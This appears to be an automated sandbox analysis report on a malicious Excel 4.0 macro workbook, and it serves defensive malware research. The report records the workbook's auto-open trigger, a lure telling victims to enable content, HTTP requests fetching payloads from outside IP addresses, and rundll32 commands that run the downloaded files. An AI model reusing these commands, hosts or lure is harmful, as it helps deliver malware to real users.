Analysis Report Comission_1980420924_03172021.xlsm

Overview

General Information

Sample Name: Comission_1980420924_03172021.xlsm
Analysis ID: 383366
MD5: 7c87c28b3c650992cca31f7728aa2cfd
SHA1: e278ae31532f3f65297d8c97d21080321cd79e9f
SHA256: c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 1MB later: 80MB
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.5:49718 -> 188.119.112.114:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 188.127.230.104:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.119.112.114 188.119.112.114
Source: Joe Sandbox View IP Address: 188.127.230.104 188.127.230.104
Source: Joe Sandbox View IP Address: 185.82.219.75 185.82.219.75
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.119.112.114Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.219.75Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.230.104
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.219.75
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.114
Source: global traffic HTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.119.112.114Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44293.7328152778.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.219.75Connection: Keep-Alive
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.office.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.onedrive.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://augloop.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cdn.entity.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cortana.ai/api
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://cr.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://directory.services.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://graph.windows.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://graph.windows.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://login.windows.local
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://management.azure.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://management.azure.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://messaging.office.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://officeapps.live.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://onedrive.live.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://outlook.office.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://settings.outlook.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://tasks.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2F831197-0868-4F34-83EA-326F8C2F8063.0.dr String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 12 Screenshot OCR: Enable editing button from the yellow bar above 12 ' Once you have enabled editing. please click En
Source: Screenshot number: 12 Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 jj 17 18 19 20 21 22 23 24 25 26
Found Excel 4.0 Macro with suspicious formulas
Source: Comission_1980420924_03172021.xlsm Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: Comission_1980420924_03172021.xlsm Initial sample: Sheet size: 19220
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E74EC3A0-E6C1-4379-B2DF-09ED883A9632}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames><calcPr calcId="162913"/></workbook>
Source: classification engine Classification label: mal64.expl.evad.winXLSM@7/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{40062FFA-61B8-40CB-BCCC-2F00295D9721} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Comission_1980420924_03172021.xlsm Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Comission_1980420924_03172021.xlsm Initial sample: OLE zip file path = xl/drawings/drawing3.xml
Source: Comission_1980420924_03172021.xlsm Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Comission_1980420924_03172021.xlsm Initial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
Source: Comission_1980420924_03172021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
